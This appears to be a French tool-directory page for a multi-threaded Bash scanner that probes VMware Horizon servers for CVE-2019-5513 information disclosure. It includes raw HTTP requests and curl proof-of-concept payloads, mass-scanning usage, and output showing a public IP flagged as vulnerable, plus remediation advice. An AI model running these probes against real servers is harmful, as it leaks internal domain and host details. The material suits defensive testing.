Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5513-scanner — Le serveur de connexion VMware Horizon est souvent utilisé comme passerelle accessible sur Internet vers l'environnement de bureau virtuel (VDI) d'une organisation. Jusqu'à récemment, la plupart de ces installations exposaient le nom interne du serveur de connexion, l'adresse IP interne de la passerelle et le domaine Active Directory à des attaquants non authentifiés. | Kitploit
Outils/GitHubGitHub/sudosu01/cve-2019-5513-scanner
ReconnaissanceScanners de VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubsudosu01/cve-2019-5513-scanner

CVE-2019-5513-scanner

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
2il y a 3 moisPas encore vérifié

À propos

Le serveur de connexion VMware Horizon est souvent utilisé comme passerelle accessible sur Internet vers l'environnement de bureau virtuel (VDI) d'une organisation. Jusqu'à récemment, la plupart de ces installations exposaient le nom interne du serveur de connexion, l'adresse IP interne de la passerelle et le domaine Active Directory à des attaquants non authentifiés.

Partager

Scanner de vulnérabilités VMware Horizon /broker/xml

Security Bash License

Un scanner multi-thread haute performance pour détecter les vulnérabilités de divulgation d'informations non authentifiées dans le point de terminaison /broker/xml de VMware Horizon Connection Server.

📋 Aperçu

VMware Horizon Connection Server expose un point de terminaison d'API XML (/broker/xml) qui peut divulguer des informations de configuration interne sensibles sans nécessiter d'authentification. Ce scanner identifie rapidement les serveurs vulnérables en testant deux vecteurs d'attaque :

  1. Corps POST vide (découverte zero-day) — Envoie une requête POST complètement vide. Le serveur divulgue des données de configuration sans aucune commande XML.
  2. XML façonné (CVE-2019-5513) — Utilise la commande XML documentée get-configuration.

🔍 Détails de la vulnérabilité

Quelles informations peuvent être divulguées ?

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>[email protected]</name>
        </broker-service-principal>
        <domain>corporate-domain.example.com</domain>
    </configuration>
</broker>

⚡ Fonctionnalités

  • Extrêmement rapide — Architecture multi-thread (50 threads concurrents par défaut)
  • Test de protocole double — Vérifie à la fois HTTPS (port 443) et HTTP (port 80) simultanément
  • Deux vecteurs d'attaque — Teste le corps POST vide (zero-day) + XML façonné (CVE-2019-5513)
  • Faibles délais d'attente — 5 secondes max par requête, délai de connexion de 3 secondes
  • Sortie claire — Résultats colorés avec réponse XML complète pour les hôtes vulnérables
  • Export des résultats — Sauvegardez tous les résultats dans un fichier avec l'option -o
  • Aucune dépendance — Utilise uniquement curl (standard sur la plupart des systèmes)

🚀 Installation

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git

cd vmware-horizon-scanner

# Rendez le script exécutable
chmod +x broker.sh

📖 Utilisation

Analyse de base

root@kitploit:~
./broker.sh -d targets.txt

Analyse avec threads personnalisés (plus rapide)

root@kitploit:~
./broker.sh -d targets.txt -t 100

Analyse et sauvegarde des résultats

root@kitploit:~
./broker.sh -d targets.txt -t 100 -o results.txt

Options de ligne de commande

OptionDescription
-d <fichier>Fichier d'entrée contenant la liste des adresses IP/noms d'hôtes (un par ligne)

Format du fichier d'entrée (targets.txt)

root@kitploit:~
# Les commentaires commencent par #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com

📊 Exemple de sortie

root@kitploit:~
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   Scanner de vulnérabilités VMware Horizon /broker/xml
   Mode multi-thread - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Test : POST vide (zero-day) + XML façonné (CVE-2019-5513)
[*] Protocoles : HTTPS + HTTP (les deux testés simultanément)

[*] Analyse de 3 hôtes...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNÉRABLE | HTTPS | EMPTY_POST
Réponse :
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>TEST-SERVER$@DOMAIN</name>
        </broker-service-principal>
    </configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NON VULNÉRABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNÉRABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] ANALYSE TERMINÉE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total des hôtes : 3
    Vulnérables : 2
    Non vulnérables : 1
    Temps écoulé : 4 secondes

🔬 Test avec Burp Suite

Pour les tests manuels, voici les requêtes brutes :

Test 1 : Corps POST vide (zero-day)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0

Test 2 : XML façonné (CVE-2019-5513)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115

<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>

📝 Commandes curl PoC

Corps POST vide

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''

XML façonné

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'

🛡️ Correction

Mettez à niveau VMware Horizon Connection Server vers une version corrigée :

VersionVersion corrigée
7.x7.8 ou ultérieure
7.5.x7.5.2 ou ultérieure
6.x6.2.8 ou ultérieure

Atténuations supplémentaires :

  • Mettez en place des contrôles d'accès réseau pour restreindre l'accès au point de terminaison /broker/xml
  • Utilisez des règles WAF pour bloquer les requêtes non authentifiées vers ce point de terminaison
  • Surveillez les requêtes POST suspectes vers /broker/xml

🙏 Crédits

Cet outil est basé sur les recherches des chercheurs en sécurité suivants :

  • Découverte originale de CVE-2019-5513 — Atredis Partners
  • Cory Mathews de Critical Start (découverte indépendante)

Découverte zero-day dans cet outil

Le vecteur d'attaque du corps POST vide a été identifié lors de recherches supplémentaires. Le CVE original nécessitait une charge utile XML façonnée ; cet outil teste également la méthode du corps vide, qui ne nécessite aucune construction de charge utile et est encore plus simple à exécuter.

⚠️ Avis de non-responsabilité

Cet outil est destiné à des fins éducatives et aux tests de sécurité autorisés uniquement. L'analyse non autorisée de systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester peut violer les lois et réglementations. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.

📄 Licence

Licence MIT

⭐ Soutien

Si vous trouvez cet outil utile, veuillez lui attribuer une étoile sur GitHub !

Télécharger l’outil
AttributValeur
CVECVE-2019-5513
Score CVSS5.3 (Moyen)
VecteurAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Produits concernésVMware Horizon Connection Server 7.x avant 7.8, 7.5.x avant 7.5.2, 6.x avant 6.2.8
Informations divulguéesNom de domaine Active Directory, nom du compte de service (compte machine), noms d'hôtes internes, adresses IP de la passerelle
-t <num>
Nombre de threads (par défaut : 50)
-o <fichier>Fichier de sortie pour sauvegarder les résultats
-hAffiche le message d'aide